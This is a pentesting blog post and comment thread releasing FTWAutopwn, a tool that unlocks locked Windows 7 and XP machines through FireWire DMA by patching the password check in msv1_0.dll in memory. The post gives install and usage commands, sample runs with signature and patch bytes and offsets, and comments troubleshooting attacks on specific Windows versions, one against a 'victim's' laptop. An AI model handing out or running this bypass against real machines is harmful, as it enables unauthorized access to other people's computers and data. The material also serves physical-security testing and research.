Posted by & filed under Hacking & Pentesting, Tools & Methodology.

Update: FTWAutopwn is now named Inception: I’ve created a standalone page for the tool here, please be referred to that page for updates on the tool.

The last days I’ve been working on an alternative to winlockpwn (unlocking locked Windows boxes through FireWire SBP2 DMA) using libforensic1394. Now I’ve released an alpha version of the tool, Fire Through the Wire Autopwn (FTWAutopwn) at github. So here’s how to use it:

Check that your distro uses the new IEEE1394 stack

$ ls /dev | grep fw

If the new stack is loaded and the system has at least one FireWire port then `fw0` should be printed. Additional ports/devices will take the form fw<n>. If no devices are listed then it is likely that the new stack is not loaded. That sucks, try this command if you’re running Debian/Ubuntu:

sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394
sudo modprobe firewire-ohci

Download and install libforensic1394

sudo apt-get install git cmake python3
wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz
tar xvf libforensic1394-0.2.tar.gz
cd libforensic1394-0.2
mkdir build
cd build
cmake -G"Unix Makefiles" ../
make
sudo make install
cd ../python
sudo python3 setup.py install

Download and use FTWAutopwn

cd
git clone https://github.com/carmaa/FTWAutopwn.git
cd FTWAutopwn
python3 ftwautopwn.py

The last command should now work. Hook up your attacking machine to a locked Windows 7 or XP machine using IEEE1394 FireWire cable, and run the above command. Select the correct target, and you’re off!

$ python3 ftwautopwn.py
Fire Through the Wire Autopwn v.0.0.1
by Carsten Maartmann-Moe <[email protected]> 2011

For updates, check out https://github.com/carmaa/FTWAutopwn
[+] Available targets:
[1] Win7 32-bit msv1_0.dll technique
[2] Win7 64-bit msv1_0.dll technique
[3] WinXP SP2 msv1_0.dll technique
[4] WinXP SP3 msv1_0.dll technique
Please select target: 4
[+] You have selected: WinXP SP3 msv1_0.dll technique
    Using signature: 83f8107511b0018b
    Using patch: 83f8109090b0018b
    Using offset: 2146
[+] Searching for signature,   12 MiB so far.
[+] Signature found at 0xd7d862.
[+] Write-back verified; patching successful. Bon voyage!

You should now be able to log onto your target machine with any password.

Full syntax is provided by using the -h/–help switch:

$ python3 ftwautopwn.py -h
Fire Through the Wire Autopwn v.0.0.1
by Carsten Maartmann-Moe <[email protected]> 2011

For updates, check out https://github.com/carmaa/FTWAutopwn
Usage: ftwautopwn [OPTIONS]

    -d --delay=TIME:      Delay attack by TIME seconds. This is useful in order
                          to guarantee that the target machine has successfully
                          installed the SBP2 device before attacking. If the
                          attack fails, try to increase this value.
    -f --file=FILE:       Use a file instead of FireWire bus data as input; for
                          example to facilitate attacks on VMware machines or
                          to ease testing and signature generation efforts
    -h, --help:           Displays this message
    -l, --list:           Lists available target operating systems
    -n, --no-write:       Dry run, do not write back to memory
    -t TARGET, --target=TARGET:
                          Specify target operating system (use --list to list
                          available targets)
    -v/--verbose:         Verbose mode

18 Responses to “Fire through the wire”

  1. Koko

    Hi. Good job but it seems thas it has dependecies problem…

    python3 ftwautopwn.py -h
    Traceback (most recent call last):
    File “ftwautopwn.py”, line 7, in
    from ftwautopwn import unlock
    File “/home/bap-hmc/FTWAutopwn/ftwautopwn/unlock.py”, line 7, in
    from forensic1394 import Bus
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/__init__.py”, line 1, in
    from .bus import Bus
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/bus.py”, line 25, in
    from forensic1394.functions import forensic1394_alloc, forensic1394_destroy, \
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/functions.py”, line 35, in
    lib = cdll.LoadLibrary(loc)
    File “/usr/lib/python3.2/ctypes/__init__.py”, line 418, in LoadLibrary
    return self._dlltype(name)
    File “/usr/lib/python3.2/ctypes/__init__.py”, line 340, in __init__
    self._handle = _dlopen(self._name, mode)
    OSError: libforensic1394.so.1: cannot open shared object file: No such file or directory

    Do you already had this problem ? Any Solution ?
    Thanks and regards.
    Koko

    Reply
    • Carsten

      Let me guess: You’re using BackTrack? I ran into the same problem, it is not a dependency issue though. The trick is to set LD_LIBRARY_PATH to /usr/local/lib, where the libforensic1394 modules are:

      export LD_LIBRARY_PATH=/usr/local/lib

      Let me know if this doesn’t work.

      Reply
      • koko

        Hi,
        No, I’m using the last ubuntu version (V 11.04).
        I solved the problem by copying the libforensics library (libforensic1394.a, libforensic1394.so.0.2.0, libforensic1394.so and libforensic1394.so.1) into /usr/lib/
        Then, it works perfectly !
        Regards,
        Koko

        Reply
  2. Mike

    very cool. It worked against an XP SP3 machine. But it didn’t work against a W7 SP1, does the signature has to be updated for W7 SP1?

    Reply
    • Carsten

      What version of Win7 are you using (open a command shell and execute winver to check and paste the whole ‘Version’ string here)? I’ll update the signatures/offsets if they’ve changed.

      Reply
      • mike

        Hi Cartsen,
        I noticed that you update the signature. I’ll give it a try. I also take a look the link listed below. Very informative. But I noticed the offset in your code is quite different. Any chance to share how you go about to find signatures, etc. ?

        Reply
        • Carsten

          Actually, the signatures is almost the same, the only difference is that I’ve chosen to include the previous ASM instruction (cmp eax, 10h) in my signature (0x0F8550940000 in the article vs. 0x83F8100F85509400 in FTWAutopwn). When unlocking the screen through Metasploit it is also important to realize that Metesploit sees virtual address space as opposed to the physical address space seen by FTWAutopwn. That’s why the Metasploit looks for the entrance point to MsvpPasswordValidate first (the ‘sig’ variable in the array in the screen_unlock.rb script) before looking for the actual signature (the ‘orig_code’ variable).

          The method for finding signatures is really similar to to the method which is described in the article; it requires a bit of disassembly but nothing too advanced. I’ll try to do a write-up on it sometime in the future, right now I’m trying to implement autodetection of OS and Service Pack Level.

          Reply
          • mike

            Thanks. Carsten. Looking forward to it. I tried the new signature against a W7 Enterprise 64-bit. Version 6.1 (build 7601: Service Pack 1). Couple of things I don’t quite get.
            1) initially the machine had 8G memory in it, with -v option, all most all the reads return 0
            2) after I took out 4G memory, it seemed that I’m getting non-zeros. but still failed to find the signature.
            My guess is that this is yet another version of the msv1_0.dll? I unfortunately haven’t got a ida pro that can do 64 bit dlls yet. But this is something I’m seriously like to learn. Looking forward to your write up.

          • Carsten

            Hmm. Looks like the signature’s much less stable on x64. The offset of the signature as well as the address of the jnz jump that we’re NOPing out are changing frequently as Microsoft make changes to the code.

            The main problem is that the jump address is > 46kB away from the jump code, so any change in the code in between will change the jump address. I’ll have to implement some kind of fuzzy matching in order to counter this. AFAIK the Win 7 32 bit signatures are stable for now, so for demo purposes I suggest attacking x32 architectures at the moment.

          • Michael Wu

            Thanks. Carsten. I appreciate that. I watch your presentation @password^11 too. I then come to realize that you were also the author of interrogate, which I also used. Very cool stuff. Keep up the good work.

    • Mike

      Very informative. I followed through using an xp sp3 version of the dll. Looks like I’ve got it. But I don’t get the purpose for this particular metasploit script. If I’ve already had a session on the box, what’s the point to unlock the screen?

      Reply
  3. Alex Cheng

    Finally got my cable. Tested it but it threw me this error:

    root@bt:/pentest/firewire/FTWAutopwn# python3.1 ftwautopwn.py
    Fire Through the Wire Autopwn v.0.0.2
    by Carsten Maartmann-Moe 2011

    For updates, check out https://github.com/carmaa/FTWAutopwn

    [+] Available targets:
    [1] Windows 7 SP1 (x86) msv1_0.dll MsvpPasswordValidate technique
    [2] Windows 7 SP1 (x64) msv1_0.dll MsvpPasswordValidate technique
    [3] Windows 7 (x86) msv1_0.dll MsvpPasswordValidate technique
    [4] Windows 7 (x64) msv1_0.dll MsvpPasswordValidate technique
    [5] Windows Vista (x86) msv1_0.dll MsvpPasswordValidate technique
    [6] Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
    [7] Windows XP SP2 (x86) msv1_0.dll MsvpPasswordValidate technique
    [8] Apple OS X 10.6.4 and lower (Intel x64) DoShadowHashAuth technique
    [9] Ubuntu 9.04 (x86) Gnome lockscreen unlock

    Please select target (or enter ‘q’ to quit): 6
    [+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
    Phase 1:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x8aa (2218)
    Phase 2:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0×862 (2146)
    Traceback (most recent call last):SBP2, please wait 1 seconds or press Ctrl+C
    File “ftwautopwn.py”, line 78, in
    main(sys.argv[1:])
    File “ftwautopwn.py”, line 74, in main
    unlock.run(ctx)
    File “/pentest/firewire/FTWAutopwn/ftwautopwn/unlock.py”, line 128, in run
    d = initialize_fw(d)
    File “/pentest/firewire/FTWAutopwn/ftwautopwn/unlock.py”, line 253, in initialize_fw
    d = b.devices()[0]
    IndexError: list index out of range

    Any idea? The winver of the tested machine is:

    Version 5.1 (Build 2600.xpsp_sp3_gdr.111025-1629 : Service Pack 3)

    Would love to try on the Vista but that machine does not have firewire… =(

    Reply
    • Alex Cheng

      Also, something weird happened. I logged in on my victim’s XP SP3 machine (meaning the Windows is not in lockscreen mode), and I re-run FTWautopwn. It managed to run (surprisingly), but the following happened:

      [+] Initializing bus and enabling SBP2, please wait 1 seconds or press Ctrl+C
      [*] Detecting memory size…
      4096 MiB main memory detected

      –snip–

      [+] Searching for signature, 4096 MiB so far.
      [+] Phase 2:
      [+] Searching for signature, 131 MiB so far.
      [-] Looks like we’re not getting any data. We could be outside memory
      boundaries, or simply not have DMA. Try using -v/–verbose to debug.
      Continue? [Y/n]: y
      [+] Searching for signature, 146 MiB so far.
      [-] Looks like we’re not getting any data. We could be outside memory
      boundaries, or simply not have DMA. Try using -v/–verbose to debug.
      Continue? [Y/n]: y
      [+] Searching for signature, 238 MiB so far.
      [+] Signature found at 0xee0f862.
      [-] Write-back could not be verified; patching unsuccessful.
      [!] Signature not found.
      [!] Attack unsuccessful.

      Sorry for spamming.

      Reply
      • Carsten

        Sorry for the late reply. Try the experimental version instead, and post again here if you run into trouble. That’s the ftwa.py command.

        Reply
        • Alex Cheng

          Cartsen, it works beautifully now! Thanks! =D (I have Mcafee running for the laptop I’m attempting to connect and it works)

          Reply

Trackbacks/Pingbacks

  1.  Alternative to winlockpwn: libforensic1394 | Break & Enter
  2.  winlockpwn on Ubuntu | Break & Enter

Leave a Reply

  • (will not be published)